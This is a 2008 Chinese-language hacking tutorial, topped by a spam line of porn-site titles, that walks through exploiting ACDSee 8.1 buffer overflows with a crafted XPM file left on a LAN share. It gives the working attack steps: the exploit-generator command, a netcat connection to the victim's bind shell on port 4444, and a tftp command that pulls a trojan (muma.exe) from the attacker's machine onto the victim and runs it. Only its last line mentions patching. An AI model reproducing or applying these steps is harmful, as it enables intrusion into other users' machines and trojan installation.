开心六月综合激情婷婷|欧美精品成人动漫二区|国产中文字幕综合色|亚洲人在线成视频

從ACDSee的漏洞看木馬入侵新思路
2008-04-25 09:34:19　來源:中關(guān)村在線　作者:張齊 點(diǎn)擊: 2025

        對(duì)于ACDSee的大名，想必各位都不陌生。不過最近ACDSee所使用的ID_X.apl、IDE_ACDStd.apl、ID_PSP.ap和AM_LHA.apl插件在處理XBM/XPM/PSP/LHA文件時(shí)出現(xiàn)緩沖區(qū)溢出漏洞

對(duì)于ACDSee的大名，想必各位都不陌生。不過最近ACDSee所使用的ID_X.apl、IDE_ACDStd.apl、ID_PSP.ap和AM_LHA.apl插件在處理XBM/XPM/PSP/LHA文件時(shí)出現(xiàn)緩沖區(qū)溢出漏洞，如果用戶打開了帶有超長(zhǎng)字符串的XBM/XPM/PSP/LHA文件的話，就可能觸發(fā)這些溢出，導(dǎo)致執(zhí)行任意指令。
本次提到的漏洞影響的版本是ACDSee Photo Manager 9.0和ACDSee Photo Manager 8.1。我們下面就具體分析一下漏洞利用的全過程。
漏洞初顯
假設(shè)在一個(gè)局域網(wǎng)中，終端上裝有ACDSee 8.1。則這個(gè)漏洞就可以派上用場(chǎng)了！畢竟對(duì)于這類軟件，用戶更新較少，對(duì)于漏洞的利用率還是很高的。

ACDSee Pro 8.1
首先利用ACDSee XPM文件溢出利用工具，將其放到一個(gè)文件夾中，然后打開“記事本”，在其中輸入如下的代碼：acdsee.exe 1 test.xpm，然后保存為一個(gè)批處理文件1.bat，和利用工具acdsee.exe放到一個(gè)文件夾中。現(xiàn)在雙擊運(yùn)行1.bat，就會(huì)在這個(gè)目錄下面生成一個(gè)名字為test.xpm的文件了，這個(gè)XPM文件是默認(rèn)被ACDSee程序關(guān)聯(lián)打開的。
提醒用戶，使用這個(gè)bat文件是為了執(zhí)行命令的方便，你也可以在cmd中進(jìn)入到這個(gè)目錄中，然后執(zhí)行“acdsee.exe 1 test.xpm”，效果是一樣的。
我們可以先在終端上進(jìn)行測(cè)試，運(yùn)行XPM文件，打開ACDSee窗口后發(fā)現(xiàn)其處于崩潰狀態(tài)。這就是溢出的結(jié)果了，下面只有在“任務(wù)管理器”里把ACDSee終結(jié)了，然后“命令提示符”窗口，在其中輸入“netstat -an”命令來查看本機(jī)的端口開放情況，如果4444端口打開了，并且處于監(jiān)聽狀態(tài)，可以說萬事俱備。把這個(gè)文件發(fā)到共享區(qū)中，如果其它用戶下載并開啟了程序，則漏洞入侵就開始了。

4444端口打開了，并且處于監(jiān)聽狀態(tài)

終端陷阱
靜待一段時(shí)間，如果幸運(yùn)的話，用掃描器掃描后會(huì)發(fā)現(xiàn)有4444端口開啟的終端（如圖6），下面就該用NC來連接肉雞以實(shí)現(xiàn)控制了。打開“記事本”程序，在其中輸入如下的代碼：nc 192.168.0.151 4444 （192.168.0.151是目標(biāo)終端的IP地址，4444就是它打開的待接端口），然后保存為一個(gè)批處理文件2.bat，和nc.exe放在同一個(gè)目錄里。

端口掃描

雙擊運(yùn)行2.bat這個(gè)文件，看見了？我們的NC順利的連接上了肉雞（如圖7），并且返回了一個(gè)CMDShell，現(xiàn)在我們?cè)谶@個(gè)窗口里的操作就等同于在肉雞上執(zhí)行命令了，嘻嘻。該是上傳個(gè)木馬的時(shí)候了，總不能什么都在這個(gè)命令提示符里操作吧，多不方便啊。說到上傳木馬，黑客最常用的就是tftp上傳了，但是小菜們可能還不太熟悉tftp的使用，下面我來詳細(xì)操作一下。
　　 上傳木馬
接下來的入侵方法就簡(jiǎn)單了，比如通過木馬客戶端，利用“TFTPD32”把它和我們要上傳的木馬muma.exe放到同一個(gè)一個(gè)目錄下,運(yùn)行它之后就會(huì)自動(dòng)在本機(jī)搭建一個(gè)TFTP服務(wù)器了。最后，將TFTPD32最小化，在剛剛得到的CMDShell里輸入如下命令并回車確定： tftp -i 192.168.0.149 get muma.exe D:\muma.exe，就可以看到上傳成功的顯示了。

IPConfig

TFTPD32

192.168.0.149是本地的IP地址，這條命令作用是把本機(jī)上的和TFTPD32在同一目錄下的muma.exe上傳到192.168.0.151上，并且放置到D:\下。如果muma.exe不是和TFTPD32.exe放在同一目錄下的話，也可以把上句中的muma.exe換成絕對(duì)路徑，比如C:\windows\muma.exe，一樣可以成功上傳。
輸入命令muma.exe運(yùn)行即可，至此，一次完整的漏洞利用及入侵過程就結(jié)束了，ACDSee的這個(gè)漏洞非常隱蔽，但對(duì)于局域網(wǎng)用戶來說卻異常可怕，管理員還是批量升級(jí)軟件吧。